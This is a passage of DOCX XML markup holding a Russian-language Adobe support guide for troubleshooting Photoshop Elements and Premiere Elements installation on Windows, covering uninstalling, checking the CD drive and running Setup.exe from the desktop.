        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Панель управления</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows 7 / Vista).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1156054" cy="1792800"/>
            <wp:effectExtent l="19050" t="0" r="5996" b="0"/>
            <wp:docPr id="148" name="Рисунок 169" descr="Правой кнопкой мыши нажмите кнопку запу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Правой кнопкой мыши нажмите кнопку запуска"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1159045" cy="1797438"/>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 xml:space="preserve">Примечание. Процедуры в этом документе основаны на настройках интерфейса Windows. Если интерфейс настроен индивидуально, некоторые процедуры могут отличаться. Например, чтобы открыть </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Панель управления</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> из меню </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, может потребоваться выбрать </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пуск &gt; Настройки &gt; Панель управления</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> вместо </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пуск &gt; Панель управления</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(Windows 10 / Windows 8) При просмотре панели управления по категориям в категории </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программы</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> нажмите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Удалить программу</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. При просмотре по значкам выберите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программы и компоненты</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(Windows 7) выберите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программы &gt; Программы и компоненты</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и двойным нажатием выберите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Удалить программу</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(Vista) выберите </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программы</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программы и компоненты</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2400150" cy="1464229"/>
            <wp:effectExtent l="19050" t="0" r="150" b="0"/>
            <wp:docPr id="149" name="Рисунок 170" descr="Панель у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Панель управления"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2408808" cy="1469511"/>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Выберите</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adobe Photoshop Elements </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adobe Premiere Elements </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>нажмите</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Удалить</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Следуйте инструкциям на экране, чтобы удалить приложение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3091350" cy="627541"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="150" name="Рисунок 171" descr="Удал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Удалить"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3130529" cy="635494"/>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После завершения процесса удаления закройте панель управления и вернитесь в папку на жестком диске, в которую изначально было установлено приложение. Удалите следующие папки (если программа установки не удалила их): Photoshop Elements или Premiere Elements и Elements Organizer. (По умолчанию они создаются в папке Program Files/Adobe.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2486550" cy="1686420"/>
            <wp:effectExtent l="19050" t="0" r="9000" b="0"/>
            <wp:docPr id="151" name="Рисунок 172" descr="Удалите па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Удалите папку"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2492648" cy="1690556"/>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 xml:space="preserve">Если появится диалоговое окно подтверждения удаления папки, нажмите кнопку </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Да</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Очистите корзину, а затем перезагрузите компьютер.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="main-pars_header_5"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Проверьте CD-диск и дисковод CD-ROM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="main-pars_text_3"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пыль или грязь на CD-диске могут помешать процессу установки и могут препятствовать распознаванию CD-диска в дисководе CD-ROM. Осмотрите CD-диск с Photoshop Elements и Premiere Elements на предмет наличия грязи, пыли или отпечатков пальцев. Осторожно протрите нижнюю часть CD-диска от центра к краю мягкой безворсовой тканью.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Убедитесь, что дисковод CD-ROM может считывать другие СD-диски. Если дисковод CD-ROM не считывает другие CD-диски, осмотрите картридж для CD-диска или загрузочный приемник на предмет наличия грязи, выполните очистку безворсовой тканью. Если он все равно не может считывать другие CD-диски, обратитесь к производителю дисковода или производителю компьютера.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если ваш диск оказался поврежденным, обратитесь к поставщику для замены. Если вы приобрели диск непосредственно в компании Adobe, обратитесь в </w:t>
      </w:r>
      <w:hyperlink r:id="rId59" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Службу поддержки клиентов</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. (Выберите регион в нижнем правом углу страницы службы поддержки клиентов.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="main-pars_header_6"/>
      <w:bookmarkEnd w:id="48"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Установите</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Photoshop Elements </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adobe Premiere Elements </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>рабочего</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>стола</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="main-pars_text_4"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Некоторые компоненты системы, например, драйверы устройства и инструменты защиты от вирусов, могут конфликтовать с программой установки. Они могут привести к неполной установке или к сбою установки. Для предотвращения этих конфликтов выполняйте установку с рабочего стола.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Скопируйте папку Adobe Photoshop Elements или Adobe Premiere Elements с диска на рабочий стол.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Откройте папку Adobe Photoshop Elements или Premiere Elements на рабочем столе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Двойным нажатием запустите файл Setup (или Setup.exe) и следуйте инструкциям на экране.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2256150" cy="934123"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="152" name="Рисунок 173" descr="Файл настрой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Файл настройки"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2262102" cy="936587"/>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Примечание. Для некоторых из этих процедур требуется указать путь к скрытым файлам и папкам или найти файлы по их полным именам, включая расширения (например, Setup.exe или Sample_filename.ini). По умолчанию Проводник Windows не показывает скрытые файлы, папки, а также распознаваемые расширения файлов. Для получения справки см. в раздел</w:t>
      </w:r>
      <w:hyperlink r:id="rId61" w:history="1">
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>«</w:t>
        </w:r>
        <w:r w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Показать скрытые файлы, папки и расширения файлов</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D22F20" w:rsidRPr="00617AC0" w:rsidRDefault="00D22F20" w:rsidP="00D22F20">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="main-pars_header_7"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Установите последние пакеты обновлений Windows и другие обновления.</w:t>
      </w:r>
    </w:p>
